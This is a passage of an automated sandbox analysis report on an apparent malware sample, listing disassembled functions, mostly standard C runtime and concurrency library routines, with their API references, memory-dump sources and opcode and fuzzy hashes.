                                                        • Instruction Fuzzy Hash: 6461D271904205EFEF20DF68C842B9EBBF5EB85360F15C16AE948EB241EB749D41CB51
                                                        Function 00742080 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _strlen$H_prolog3_
                                                        • String ID: 4#E$i
                                                        • API String ID: 2786647812-2480119546
                                                        • Opcode ID: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                        • Instruction ID: 7b0be22f681673ac4fcb2497a05e3eae954b939d43930170b6882cf7b92f3419
                                                        • Opcode Fuzzy Hash: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                        • Instruction Fuzzy Hash: 6D51E530C00384DBD721DFA4ED497ADBB74FF2A306F045225E841A6173EBB89A85C769
                                                        Function 0076520D Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00765226
                                                        • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0076523B
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0076524A
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00765258
                                                        • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 007652CE
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0076530E
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0076531C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleProxy::ResetSuspendThread
                                                        • String ID:
                                                        • API String ID: 1615543006-0
                                                        • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                        • Instruction ID: 504631a24436fee4e3bc6b41df0fd5f14e3dcccb91c9ae74dc4c9580fb903165
                                                        • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                        • Instruction Fuzzy Hash: 8531F475A00614DFCF04EF68C895AADB3B5FF54310F204569ED12A7282DB78EE05DB90
                                                        Function 0075B886 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _SpinWait.LIBCONCRT ref: 0075B8AB
                                                          • Part of subcall function 007518E1: _SpinWait.LIBCONCRT ref: 007518F9
                                                        • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0075B8BF
                                                        • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0075B8F1
                                                        • List.LIBCMT ref: 0075B974
                                                        • List.LIBCMT ref: 0075B983
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                        • String ID: 6+A
                                                        • API String ID: 3281396844-2819411039
                                                        • Opcode ID: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                        • Instruction ID: e7d1036a4f78e63a68df7777c66706ccd7f9b9cb5903e37aa7abfc3aef3f6a89
                                                        • Opcode Fuzzy Hash: 6ffcc6e76adf532cd1f074ee0a3a399835260594ca9526c60de83cd6ea276e11
                                                        • Instruction Fuzzy Hash: 00315532E0165ADFCB14EFA4C5956EDB7B0BF04306F14406ADD416B282DBB97E08CB90
                                                        Function 0077AD43 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                        • Instruction ID: be3c4be0e27d2f79b5bc906b510cea28b17cddf4df82307d659ab148ab6e2f04
                                                        • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                        • Instruction Fuzzy Hash: 80111F72540B04FAED21B7B0CD0BFCF779CAF44790F42C829B69E6A052DA6DB6049B51
                                                        Function 004091C4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __getptd.LIBCMT ref: 004091D0
                                                          • Part of subcall function 00406C6B: __getptd_noexit.LIBCMT ref: 00406C6E
                                                          • Part of subcall function 00406C6B: __amsg_exit.LIBCMT ref: 00406C7B
                                                        • __amsg_exit.LIBCMT ref: 004091F0
                                                        • __lock.LIBCMT ref: 00409200
                                                        • InterlockedDecrement.KERNEL32(?), ref: 0040921D
                                                        • InterlockedIncrement.KERNEL32(007B2CE0), ref: 00409248
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                        • String ID: ,{
                                                        • API String ID: 4271482742-450320262
                                                        • Opcode ID: 0e8d2816f694c4c46d90cb8f16ffb96b1a4c50a28fff4123f355a5bd6d552678
                                                        • Instruction ID: dcd903aad5bc4b3d0ec1472a1e987bc59788f9cdbed50114020c810e999c6897
                                                        • Opcode Fuzzy Hash: 0e8d2816f694c4c46d90cb8f16ffb96b1a4c50a28fff4123f355a5bd6d552678
                                                        • Instruction Fuzzy Hash: 23015231A05711BBE720AF66984975E7360AB40755F05807BE8047B6E3C73C9D41DB9D
                                                        Function 0077A805 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: h|aE
                                                        • API String ID: 269201875-4167925309
                                                        • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                        • Instruction ID: 17df4946aadb0381153723248516eb70858ed91b4006e33315a234035d6f8972
                                                        • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                        • Instruction Fuzzy Hash: 7DF06232505A00FB9E25EB54E48AC1E73D9FA407A0B658919F00CDB612DF39FD818B57
                                                        Function 0076EB72 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __cftoe
                                                        • String ID:
                                                        • API String ID: 4189289331-0
                                                        • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                        • Instruction ID: e5b94f1ad39255b1aa617dfe13f3643fce4087f4b6fbabb3ae1ca365165518e7
                                                        • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                        • Instruction Fuzzy Hash: 26510A7A500205EBDF205B5CCC49EAE77A9EF49370F248219FC1BA6182EB3DDD008675
                                                        Function 00763784 Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 007637AA
                                                        • SafeSQueue.LIBCONCRT ref: 007637C3
                                                        • Concurrency::location::_Assign.LIBCMT ref: 00763883
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007638A4
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 007638B2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_Exception@8QueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                        • String ID:
                                                        • API String ID: 1854678904-0
                                                        • Opcode ID: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                        • Instruction ID: a96d3dfa591f85090d869d99b0b5d21e0668c04fd3d3869f5e1f410c727a9fcb
                                                        • Opcode Fuzzy Hash: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                        • Instruction Fuzzy Hash: 18311571600612DFCB25EF68C485AAAB7B0FF04711F144559ED1B9B292DB78EE09CBD0
                                                        Function 00745B95 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                        • String ID:
                                                        • API String ID: 1687354797-0
                                                        • Opcode ID: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                        • Instruction ID: e8b480bebcee50757f51981df328a8d4d35114d3a064a538f3c88eeb056bacb2
                                                        • Opcode Fuzzy Hash: 0ea570f09f259dfbc3d5b47f4c5eb340c08c0aee3b3523c1dfd7de2be87ac1a9
                                                        • Instruction Fuzzy Hash: A8215E71D05249EBDF11EBA89889BDDB7F8AF08311F144059E450B6282DB7C9944CA75
                                                        Function 00745717 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00745728
                                                        • int.LIBCPMT ref: 0074573F
                                                          • Part of subcall function 0074C721: std::_Lockit::_Lockit.LIBCPMT ref: 0074C732
                                                          • Part of subcall function 0074C721: std::_Lockit::~_Lockit.LIBCPMT ref: 0074C74C
                                                        • std::locale::_Getfacet.LIBCPMT ref: 00745748
                                                        • std::_Facet_Register.LIBCPMT ref: 00745779
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0074578F
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 007457AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                        • Instruction ID: 5c224363ebf68ef76da8f5d7afc84f8a3d1bfdc87d8ccb810127d9e6a382d1ec
                                                        • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                        • Instruction Fuzzy Hash: 9D118231D00618DBCF16EBA4C849AEE7778BF44321F244969F815672D2DB7CAE058B94
                                                        Function 007455D9 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 007455EA
                                                        • int.LIBCPMT ref: 00745601
                                                          • Part of subcall function 0074C721: std::_Lockit::_Lockit.LIBCPMT ref: 0074C732
                                                          • Part of subcall function 0074C721: std::_Lockit::~_Lockit.LIBCPMT ref: 0074C74C
                                                        • std::locale::_Getfacet.LIBCPMT ref: 0074560A
                                                        • std::_Facet_Register.LIBCPMT ref: 0074563B
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00745651
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0074566F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                        • Instruction ID: a8e116a171808951d754c19852682832216ec4bcab0947d09aed117986ec2f5f
                                                        • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                        • Instruction Fuzzy Hash: AC11CE32800618DBCF12EBA0C849AEE7774BF44721F250519F821A72D2EB7C9E04CB96
                                                        Function 0074CB4E Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0074CB5F
                                                        • int.LIBCPMT ref: 0074CB76
                                                          • Part of subcall function 0074C721: std::_Lockit::_Lockit.LIBCPMT ref: 0074C732
                                                          • Part of subcall function 0074C721: std::_Lockit::~_Lockit.LIBCPMT ref: 0074C74C
                                                        • std::locale::_Getfacet.LIBCPMT ref: 0074CB7F
                                                        • std::_Facet_Register.LIBCPMT ref: 0074CBB0
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0074CBC6
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0074CBE4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                        • Instruction ID: e752de0957f9a194ac3b7ac47cde6a68244a270a663709ab5b0fbb50182477cc
                                                        • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                        • Instruction Fuzzy Hash: 6411CE72D01218DBCF12EBA0D85AAED7774FF04321F240519F811A7292DB7C9E04CBA1
                                                        Function 0075CE19 Relevance: 9.0, APIs: 6, Instructions: 45COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • atomic_compare_exchange.LIBCONCRT ref: 0075CE35
                                                        • atomic_compare_exchange.LIBCONCRT ref: 0075CE59
                                                        • std::_Cnd_initX.LIBCPMT ref: 0075CE6A
                                                        • std::_Cnd_initX.LIBCPMT ref: 0075CE78
                                                          • Part of subcall function 00741AA9: __Mtx_unlock.LIBCPMT ref: 00741AB0
                                                        • std::_Cnd_initX.LIBCPMT ref: 0075CE88
                                                          • Part of subcall function 0075CB48: __Cnd_broadcast.LIBCPMT ref: 0075CB4F
                                                        • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0075CE96
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                        • String ID:
                                                        • API String ID: 4258476935-0
                                                        • Opcode ID: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                        • Instruction ID: 5e969cd314ac6930ca9c16232ecaca5a12d66ef6f442b234faf283a536270dc1
                                                        • Opcode Fuzzy Hash: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                        • Instruction Fuzzy Hash: 0E01D475A00605EBDB11B760894ABDDB359AF04311F144450F8009B281EBBCAA098A91
                                                        Function 00409930 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0040993C
                                                          • Part of subcall function 00406C6B: __getptd_noexit.LIBCMT ref: 00406C6E
                                                          • Part of subcall function 00406C6B: __amsg_exit.LIBCMT ref: 00406C7B
                                                        • __getptd.LIBCMT ref: 00409953
                                                        • __amsg_exit.LIBCMT ref: 00409961
                                                        • __lock.LIBCMT ref: 00409971
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                        • String ID: zE
                                                        • API String ID: 3521780317-928493823
                                                        • Opcode ID: 900c2ce03de38fa456f20974367270b762641d4d790622020c9cfeaad1c3a30e
                                                        • Instruction ID: ca5ab9f80a99aa3500e5f97090adf092ee7ef5c1b273e0f9e419ca7a81f48ec1
                                                        • Opcode Fuzzy Hash: 900c2ce03de38fa456f20974367270b762641d4d790622020c9cfeaad1c3a30e
                                                        • Instruction Fuzzy Hash: CAF06D72900B009AD620BBBA940675A32A0AB00B18F11817FE845BB3D3CB7C9D01CB5D
                                                        Function 00771404 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                        • Instruction ID: 67fa43efbce51fc3dba7eec40e60258cfbdb06804c5537f93657ae5d9bb96731
                                                        • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                        • Instruction Fuzzy Hash: AE51C131A00204EFDF24DF29C841A6A77F5EF59764B54856DE80EDB250E739DE10CB80
                                                        Function 00771E9B Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: d1a774ea9ce6575dc428b1b71f4827ef0b1aa832da3c12ae412e337b7ef2ab28
                                                        • Instruction ID: c5602fc89b262e917f35debb7187a198d8c3f0d13576e1cd34bd2f8d56ef041a
                                                        • Opcode Fuzzy Hash: d1a774ea9ce6575dc428b1b71f4827ef0b1aa832da3c12ae412e337b7ef2ab28
                                                        • Instruction Fuzzy Hash: E641E636A00304DFDF10DF7CC884A6AB3B5EF89754B558569E909EB241DB35AD01CB80
                                                        Function 00745824 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 00745801
                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00745815
                                                          • Part of subcall function 0074C50C: __EH_prolog3_GS.LIBCMT ref: 0074C513
                                                        • std::_Locinfo::_Locinfo.LIBCPMT ref: 0074587A
                                                        • __Getcoll.LIBCPMT ref: 00745889
                                                        • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00745899
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                        • String ID:
                                                        • API String ID: 1844465188-0
                                                        • Opcode ID: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                        • Instruction ID: 8b75ffbde3d8e6b72aaf225da4234216b63747608046a63086886704982258e9
                                                        • Opcode Fuzzy Hash: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                        • Instruction Fuzzy Hash: 9F219F72811308EFDB51EFA4C449BDDB7B0BF40311F548459E885AB282DBBCA944CB91
                                                        Function 00406145 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __lock.LIBCMT ref: 00406163
                                                          • Part of subcall function 0040481C: __mtinitlocknum.LIBCMT ref: 00404832
                                                          • Part of subcall function 0040481C: __amsg_exit.LIBCMT ref: 0040483E
                                                          • Part of subcall function 0040481C: EnterCriticalSection.KERNEL32(?,?,?,0040A5F5,00000004,004564E0,0000000C,00408012,74DEDFA0,?,00000000,00000000,00000000,?,00406C1D,00000001), ref: 00404846
                                                        • ___sbh_find_block.LIBCMT ref: 0040616E
                                                        • ___sbh_free_block.LIBCMT ref: 0040617D
                                                        • HeapFree.KERNEL32(00000000,74DEDFA0,00456330,0000000C,004047FD,00000000,004562F0,0000000C,00404837,74DEDFA0,?,?,0040A5F5,00000004,004564E0,0000000C), ref: 004061AD
                                                        • GetLastError.KERNEL32(?,0040A5F5,00000004,004564E0,0000000C,00408012,74DEDFA0,?,00000000,00000000,00000000,?,00406C1D,00000001,00000214), ref: 004061BE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1708685391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1708671754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708685391.000000000041A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708730270.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708743808.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708757714.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1708772744.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 2714421763-0
                                                        • Opcode ID: 0926ccb032055abb2c659ef93006b9faa9ed87a5e4078c39cb17a2080ed973d6
                                                        • Instruction ID: 0d43752cca9b1bcde2817ab654213c7ecedecb06e1d8315643d3149bfe8e72ac
                                                        • Opcode Fuzzy Hash: 0926ccb032055abb2c659ef93006b9faa9ed87a5e4078c39cb17a2080ed973d6
                                                        • Instruction Fuzzy Hash: BB018F72900701AEEF207FB2A806B5F3A649F40768F11813FF901BA1D2DA7C8850CE5C
                                                        Function 007582E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0075830A
                                                          • Part of subcall function 00761973: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0076199A
                                                          • Part of subcall function 00761973: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 007619B3
                                                          • Part of subcall function 00761973: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00761A29
                                                          • Part of subcall function 00761973: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00761A31
                                                        • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00758318
                                                        • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00758322
                                                        • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0075832C
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0075834A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowVirtualWork
                                                        • String ID:
                                                        • API String ID: 2080793376-0
                                                        • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                        • Instruction ID: 0b03ad23a82f62d0fd531b93a3cd6c9f0dbd680916fea063aeed78d30500c074
                                                        • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                        • Instruction Fuzzy Hash: E1F0FC31A00218E7CA15B775D81A5FDB7255F90B52B04412AFC1163192EFEC9F0DC7C6
                                                        Function 007720EA Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1709092739.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_740000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
